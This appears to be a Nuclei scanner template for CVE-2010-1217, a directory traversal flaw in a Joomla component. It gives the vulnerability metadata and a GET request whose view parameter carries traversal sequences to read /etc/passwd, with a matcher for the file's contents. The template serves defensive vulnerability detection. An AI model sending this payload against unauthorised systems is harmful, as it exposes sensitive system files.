id: CVE-2010-1217 info: name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11814 - https://nvd.nist.gov/vuln/detail/CVE-2010-1217 - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt - http://www.exploit-db.com/exploits/11814 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-1217 cwe-id: CWE-22 epss-score: 0.01155 epss-percentile: 0.84543 cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: je_form_creator product: je_form_creator tags: cve,cve2010,edb,packetstorm,joomla,lfi,plugin,je_form_creator http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a0047304502201a816ac69e3484194480569546383ac95a39384b1b81b2edcca4f7d78766e49d022100b824268cecc97ebb54940329e54d6aa376f07f1fb432068386894a744808661d:922c64590222798bb761d5b6d8e72950